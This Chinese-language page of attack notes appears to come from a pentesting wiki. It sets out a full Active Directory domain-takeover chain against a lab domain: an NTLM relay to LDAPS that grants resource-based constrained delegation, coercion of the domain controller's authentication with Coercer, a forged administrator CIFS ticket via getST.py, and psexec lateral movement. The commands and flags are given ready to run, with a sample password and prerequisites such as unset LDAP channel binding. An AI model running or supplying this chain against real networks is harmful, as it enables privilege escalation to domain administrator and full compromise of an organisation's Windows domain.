强制身份验证+基于资源的约束委派

强制身份验证+基于资源的约束委派利用

环境
dc.fbi.gov 10.10.10.139
dc1.fbi.gov 10.10.10.144
kali 10.10.10.10

设置监听，准备relay到ldaps设置test233$到目标dc机器的基于资源的约束委派

python3 ntlmrelayx.py -t ldaps://10.10.10.144 --delegate-access --escalate-user test233\$ --remove-mic --no-dump -smb2support
# 这里用ldaps，如果使用ldaps即使对方要求使用ldap签名也能攻击成功，而ldap就会失败

强制dc对kali机器进行身份验证

python3 Coercer.py coerce  -l 10.10.10.10 -t 10.10.10.139 -u "test2" -p "Ace231..." -d fbi.gov -v   
# 10.10.10.10为kali的ip，10.10.10.139为目标机器DC-ip

成功设置从test233$到dc$的基于资源的约束委派，接下来就是基于资源约束委派的攻击手法

利用机器用户test233$凭据请求dc的cifs票据，导入票据

getST.py fbi.gov/test233$:Ice231... -spn cifs/dc.fbi.gov -impersonate administrator -dc-ip 10.10.10.139

export KRB5CCNAME=/home/ice/administrator.ccache

利用psexec对dc机器进行横向

psexec.py -k fbi.gov/administrator@dc.fbi.gov -no-pass -dc-ip 10.10.10.139 -target-ip 10.10.10.139

注：这里打dc的时候需要一个副域控，直接relay到自己貌似是无法成功的，所以要relay到副域控

利用条件

需要域用户(机器用户)凭据或令牌
Windows 的远程过程调用需要身份验证，而Authenticated Users是在所有域机器的users组里面，这是经过身份验证的用户，那所有机器用户和域用户都算是该类用户
域控为Windows Server 2012及以上
Windows server 2012开始有基于资源的约束委派设置
未开启策略域控制器：LDAP服务器通道绑定令牌要求，默认没有设置

PreviousRemotePotato0+ntlm relay to ldap NextADCS权限提升

Last updated 2 years ago

hashtag强制身份验证+基于资源的约束委派利用

hashtag利用条件

强制身份验证+基于资源的约束委派利用

利用条件